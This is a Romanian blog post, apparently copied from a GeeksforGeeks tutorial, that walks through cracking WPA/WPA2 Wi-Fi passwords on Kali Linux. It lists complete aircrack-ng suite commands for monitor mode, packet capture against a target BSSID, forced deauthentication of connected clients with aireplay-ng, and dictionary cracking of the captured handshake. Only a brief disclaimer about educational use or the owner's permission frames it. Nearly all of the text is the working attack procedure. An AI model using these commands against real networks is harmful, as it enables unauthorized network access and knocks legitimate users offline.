Maybaygiare.org

Blog Network

GeeksforGeeks

„Hacking Wifi” sună foarte cool și interesant. Dar, de fapt, hacking wifi practic este mult mai ușor cu o listă de cuvinte bună. Dar această listă mondială nu este de nici un folos până când nu avem nici o idee despre cum să folosim de fapt acea listă de cuvinte pentru a sparge un hash. Și înainte de a sparge hash-ul, trebuie să-l generăm. Deci, mai jos sunt acei pași împreună cu câteva liste de cuvinte bune pentru a sparge un wifi WPA/WPA2.

notă: utilizați metodele de mai jos numai în scopuri educaționale/de testare pe cont propriu wifi sau cu permisiunea proprietarului. Nu utilizați acest lucru în scopuri rău intenționate.

deci, porniți Kali Linux. Deschideți fereastra terminalului. Și efectuați următorii pași.

Pasul 1: ifconfig(configurare interfață) : pentru a vizualiza sau modifica configurația interfețelor de rețea din sistemul dvs.

ifconfig

ifconfig-linux-interface-configuration

aici,

  • eth0 : prima interfață Ethernet
  • l0 : interfață Loopback
  • wlan0 : prima interfață de rețea fără fir din sistem. (Aceasta este ceea ce avem nevoie.)

Pasul 2: Opriți procesele curente care utilizează interfața WiFi.

airmon-ng check kill

stop-process-which-are-using-wifi-linux

Pasul 3: pentru a porni wlan0 în modul monitor.

airmon-ng start wlan0

start-interfață-linux

Pasul 4: pentru a vizualiza toate rețelele Wifi din jurul tău.

airodump-ng wlan0mon

vizualizați toate rețelele wifi

aici,

  • airodump-ng: pentru captarea pachetelor
  • wlan0mon : Numele interfeței (acest nume poate fi diferit pe diferite dispozitive)

apăsați Ctrl+C pentru a opri procesul când ați găsit rețeaua țintă.

Pasul 5: pentru a vizualiza clienții conectați la rețeaua țintă.

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

vizualizare-conectat-clienti-la-țintă

aici,

  • airodump-ng : pentru captarea de pachete
  • -C : Canal
  • –bssid : adresa MAC a unui punct de acces fără fir(WAP).
  • -w: directorul în care doriți să salvați fișierul(fișier parolă).
  • wlan0mon: numele interfeței.

Pasul 6: Deschideți o nouă fereastră de terminal pentru a deconecta clienții conectați la rețeaua țintă.

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

deconectați clienții conectați la țintă

  • aireplay-ng : pentru a injecta cadre
  • -0 : pentru deautentificare
  • 10 : nu. de pachete deauthentication care urmează să fie trimise
  • -a : pentru BSSID a rețelei țintă
  • wlan0mon: numele interfeței.

când Clientul este deconectat de la rețeaua țintă. El încearcă să se reconecteze la rețea și când o face, veți primi ceva numit strângere de mână WPA în fereastra anterioară a terminalului.

captarea-WPA-handshake

acum, am terminat cu captarea pachetelor. Deci, acum Puteți închide fereastra terminalului.

Pasul 7. Pentru a decripta parola. Deschideți aplicația Fișiere.

pentru a-decripta-parola-de-strângere de mână

aici,

  • hacking-01.cap este fișierul de care aveți nevoie.
    aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap
  • aircrack-ng : 802.11 cheile WEP și WPA-PSK programul de cracare
  • -a:- a2 pentru WPA2 &- a pentru rețeaua WPA
  • – b : BSSID-ul rețelei țintă
  • – w: locația fișierului listei de cuvinte
  • /root/hacking-01.cap: locația fișierului cap

puteți descărca fișierul de parole comune de pe internet și, dacă doriți să creați propriul fișier, atunci puteți utiliza instrumentul crunch
WiFi-parola-cracare

etichete articol :

Lasă un răspuns

Adresa ta de email nu va fi publicată.